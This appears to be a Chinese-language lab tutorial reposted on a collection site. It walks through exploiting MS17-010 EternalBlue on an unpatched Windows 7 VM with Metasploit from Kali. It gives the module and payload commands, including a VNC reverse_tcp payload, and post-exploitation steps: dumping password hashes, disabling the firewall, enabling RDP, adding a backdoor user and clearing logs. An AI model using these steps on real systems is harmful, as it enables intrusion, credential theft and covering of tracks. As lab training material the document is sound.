kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7
kail利用msf工具對ms17-010(永恒之藍)漏洞入侵滲透Win7
前言:
提到操作系統(tǒng)漏洞,大家肯定聽說過耳熟能詳?shù)挠篮阒{(MS17-010)了,他的爆發(fā)源于WannaCry勒索病毒的誕生。
該病毒是不法分子利用NSA(National Security Agency,美國國家安全局)泄露的危險漏洞“EternalBlue”(永恒之藍)進行傳播 。勒索病毒肆虐,儼然是一場全球性互聯(lián)網(wǎng)災(zāi)難,給廣大電腦用戶造成了巨大損失。最新統(tǒng)計數(shù)據(jù)顯示,100多個國家和地區(qū)超過10萬臺電腦遭到了勒索病毒攻擊、感染。 勒索病毒是自熊貓燒香以來影響力最大的病毒之一。
實驗環(huán)境:
工具:metasploit
靶機兩臺:windows 7sp1和kali2020
攻擊機IP地址:192.168.29.131
被攻擊機IP地址:192.168.29.128
實驗條件:兩臺機子可以互通的,并且windows 7sp1(無補丁)開啟了445端口,防火墻是關(guān)閉的。
?
步驟:
1、在kali里面打開metasploit漏洞利用框架
2、搜索ms17-010漏洞利用模塊 search 17-010
找到exploit/windows/smb/ms17_010_eternalblue
其中exploit具有攻擊性,auxliary是用來驗證的。
3、使用利用模塊use+exploit/windows/smb/ms17_010_eternalblue
4、查看配置項 show options
5、設(shè)置 靶機IP地址(RHOST),攻擊機IP地址(LHOST)
再次查看配置項
6、實施攻擊exploit/run
7、攻入目標(biāo)主機
Meterpreter 是 Metasploit 的一個擴展模塊,可以調(diào)用 Metasploit 的一些功能,
對目標(biāo)系統(tǒng)進行更深入的滲透,如獲取屏幕、上傳/下載文件、創(chuàng)建持久后門等。
?
在攻擊進去的情況下演示幾個功能
1、查看目標(biāo)主機的操作系統(tǒng)信息(sysinfo)
2、對目標(biāo)主機的屏幕進行截圖(截圖保存在/root下)
3、查看目標(biāo)主機所有的用戶名和密碼(密碼顯示為hash值)
4、獲取shell頁面
亂碼解決方法:
輸入chcp 65001可將亂碼解決
5、關(guān)閉防火墻
6、關(guān)閉Telnet服務(wù)
7、用兩種方法開啟遠程桌面服務(wù),并查看遠程桌面功能啟用情況
(1)方法1:run??getgui ?-e
(2)方法2:run?post/windows/manage/enable_rdp
到windows7sp1上查看遠程桌面功能啟用情況
8、創(chuàng)建系統(tǒng)用戶(創(chuàng)建用戶名為:test,密碼為:123456)
9、清除日志
?
使用VNC payload遠程操控目標(biāo)電腦
1,輸入Background,返回退出meterpreter界面
2,查看set payload 參數(shù)(輸入set payload 按兩下 TAB鍵 )
找到windows/x64/vncinject/reverse_tcp,復(fù)制黏貼
3,set payload windows/x64/vncinject/reverse_tcp
4,set viewonly no
5,exploit
成功獲取控制權(quán)
?
?
總結(jié)
以上是生活随笔為你收集整理的kail利用msf工具对ms17-010(永恒之蓝)漏洞入侵渗透Win7的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: kail利用msf工具对MS12-020
- 下一篇: kali利用msf工具对ms08-067